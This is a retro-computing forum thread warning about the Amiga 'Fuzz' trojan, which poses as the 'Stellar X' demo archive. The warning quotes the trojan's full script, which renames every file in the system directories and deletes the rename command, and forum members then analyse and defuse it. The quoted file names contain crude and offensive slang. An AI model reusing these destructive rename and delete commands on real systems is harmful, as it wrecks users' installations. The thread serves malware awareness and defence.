Amiga Virus Warnings

[Crashdisk]

This message to share with you a very recent trojan alert :

Code:

     ------------------------
     Amiga Virus Encyclopedia
     Fuzz Trojan
     
     Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE
     ------------------------------------------------------------
     
     ........................  VIRUS HELP DENMARK  ......................

     Hi All....                                             11 april 2020

     We have just recived this archive. It is said to be a demo for ECS &
     AGA machines. But if you run this demo, your Amiga system will in C:,
     S:, Devs:, L; Libs:, will be renamed
     
     We are not really sure how old this trojan are but at this time there
     is NO ANTIVIRUS program that can find it. So watch out for it.
     
     Here is some info about the trojan:
     ------------------------------------------------------
     Trojan name... : Fuzz
     Trojan file... : Many files do damage
     Trojan size... : Many files
     Trojan archive : Stellarx.lha
     Archive size.. : 444.898 bytes
     Archive info.. : 'Stellar X' Demo - ECS & AGA Machines
     ------------------------------------------------------

     There is an ReadMe.txt in the archive, with an add from a Canadian BBS,
     called 'Peace Courier Canadian HQ', saying use a 14.4 USR Dual modem.
     So we guess it must be an old trojan, there aint many BBS'es left


     The trojan bomb is named 'Stellar X Demo'. When you start the Demo, 
     it looks like this:
     Yo! Fuk-Dat-Boyee... UpTheAss
     Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
     navel creditz


     The FuZZ trojan archive contains many other files:

     BooYaKa               = Script-File
     BooYaka.info          = Icon
     ReadMe.txt            = BBS add
     DATA/Boyee            = Rename-Command
     DATA/Yo!              = Run-Command
     DATA/Fuk-Dat-Boyee... = CLI Show-Command (Picture-Shower)
     DATA/navel            = Execute-Command
     DATA/Fuk-Diz-Boyee... = Noiseplayer (Module-Player)
     DATA/Wigger!          = Soundmodule
     DATA/fuzzy            = List-Command
     DATA/creditz          = Script-File
     DATA/Dude             = Dir-Command
     DATA/BooYaKa          = Script-File
     DATA/UpTheAss         = Picture


     If you start the trojan, it executes the Script-File 'BooYaKa':

     Where you can read this in the script:
     cd data         
     execute booyaka

     This means that the trojan will execute the file
     'DATA/BooYaKa'. This file contains:

     Yo! Fuk-Dat-Boyee... UpTheAss
     Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
     navel creditz         

     Now the trojan displays the picture 'UpTheAss'.
     Then the module Wigger!.
     And executes the script-file creditz:

     fuzzy >rank s: lformat "boyee %s%s s:%s.FuZZ" navel rank
     fuzzy >rank devs: lformat "boyee %s%s devs:%s.FuZZ" navel rank
     fuzzy >rank libs: lformat "boyee %s%s libs:%s.FuZZ" navel rank
     fuzzy >rank l: lformat "boyee %s%s l:%s.FuZZ" navel rank
     fuzzy >rank fonts: lformat "boyee %s%s fonts:%s.FuZZ" navel rank
     fuzzy >rank c: lformat "boyee %s%s c:%s.FuZZ" navel rank
     delete c:rename

     Now the trojan will rename every file in:
     S:
     C:
     Fonts:
     Libs:
     L:
     Devs:
     And deletes the command c:rename

     Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE


     Regards....
          __      Jan Andersen
     __  ///      ------------
     \\\///    Virus Help Denmark 
      \XX/        www.vht-dk.dk

Source : https://www.vht-dk.dk/amiga/amiga.htm

[Foul]

Thx for the info !

[PDrill]

As the original message is more of an announcement than a question, I dare to write a few lines about viruses here.

I've been wondering, do you people still find viruses in your Amiga systems? I remember back in the day when we used to get games the_way_we_did, demo- and utils disc etc, at least I found a lot of them. Very ofter after trying for example a few games and booting from HD after that, VirusX told me that something (mostly Lamer Exterminator) was found in the memory.

Today we get all our 'warez' online in ADF format, and one would think they are the exact same discs than 30 years ago but during my retrosessions over the years I can't remember a single issue with viruses. Were my friends just careless (well, most likely, I was the only one doing also other things than only gaming) or is the retroscene so aware of things that stuff has been cleaned before distributing or what is the case?

[Gorf]

how can it delete "rename" after it renamed everything in c: ?

[ma693541]

It can do that if the "Rename" command is resident in memory.

[Crashdisk]

@PDrill
We are more informed today than we were back then and, more importantly, the mode of distribution has changed. Before, there was a lot of hand-to-hand exchange and that favoured the spread of viruses. Today, we have access to the same sources and in case of contamination, we warn the author to correct the problem at the root (example : Cetro del Sol).

@Gorf
This line seems misplaced as it should delete "Rename" before changing the names in folder C:
You can be malicious and stupid!

[Gorf]

Quote:

Originally Posted by ma693541

It can do that if the "Rename" command is resident in memory.

how so?

[ma693541]

Have you never heard of a OS that have the commands resident in memory?

[Gorf]

Quote:

Originally Posted by ma693541

Have you never heard of a OS that have the commands resident in memory?

but how would that help to delete the file "c:rename" if that file does not exist any longer?

[daxb]

The last line (delete c:rename) in the script shouldn't work, because of renaming everything in C: first.

[andy2004]

if the scripts isnt run or executed then the trojan doesnt run.. so delete the file creditz which is the script which does the renaming or is that just to simple..
or replace the creditz file/script with a blank 0byte file called creditz. or better yet just get the whole file deleted from wherever its uploaded.

[thomas]

Quote:

Originally Posted by PDrill

I've been wondering, do you people still find viruses in your Amiga systems?

Were my friends just careless

People are indeed careless. As a result every now and then a thread pops up complaining the the Amiga / Harddrive / HDF / Emulation does not boot any more or strange things happen. After investigation it turns out as an infection with a known virus. Some even infect their entire floppy collection with a boot virus, just because they don't enable the write protection.

[Crashdisk]

@andy2004
yes, to avoid the malicious code, just delete the line "navel creditz" of "DATA/BooYaKa" but you would do it because you know there is a problem with this archive..
I found 3 different warez sources for this archive and I didn't search too much.
For me the biggest problem in there is that no antivirus detects this script...

[AMIGASYSTEM]

Quote:

Originally Posted by Crashdisk

@
yes, to avoid the malicious code, just delete the line "navel creditz" of "DATA/BooYaKa" but you would do it because you know there is a problem with this archive..

In the DATA folder there is also a file named "brainfile" which is actually an LHA archive that is the backup of "STELLARX.LHA", if you run it in this version there will be a graphic demo that will hide the file rename all file system with the extension .fuzz

-> Navel (camouflaged file is basically the old "Execute" from 1991)
-> fuzzy (this is also a camouflaged file is the 1991 "List" command)
-> boyee (another camouflage is the 1991 "Rename" command)

[andy2004]

I would delete the line except for 1 thing.. i dont do DEMOS, never have in all the years i had an amiga.. didn't have a hdd either in my a600, and memory would have been cleaned at every reboot after inserting a new disk. Yes i looked at disc mags, games, but mainly apps.

[Crashdisk]

Here is my list of bootblocks viruses with the detection (or not!) by the library on which the latest antivirus is based : xvs.library v33.42
Stay safe...

[Retro1234]

If you worked your way through BBS collections you probably would get a virus.

[Hewitson]

Quote:

Originally Posted by andy2004

memory would have been cleaned at every reboot after inserting a new disk.

A soft reboot does not clear the memory.

[zipper]

Keep pressed 10 seconds.

[AC/DC HACKER!]

Mostly I wasn't into demos either, except for games. Once extracted..I'd check the contents. Then I see rap slang or "irritated" stuff, I'd delete. But then I enjoyed checking scripts too, I checked all stuff I download..at least once. Unless I knew the source is good. Most people I knew checked stuff. But still kept VirusZ and others handy. Rarely did anything get through..."our firewall", haha.

Thanks for the tip!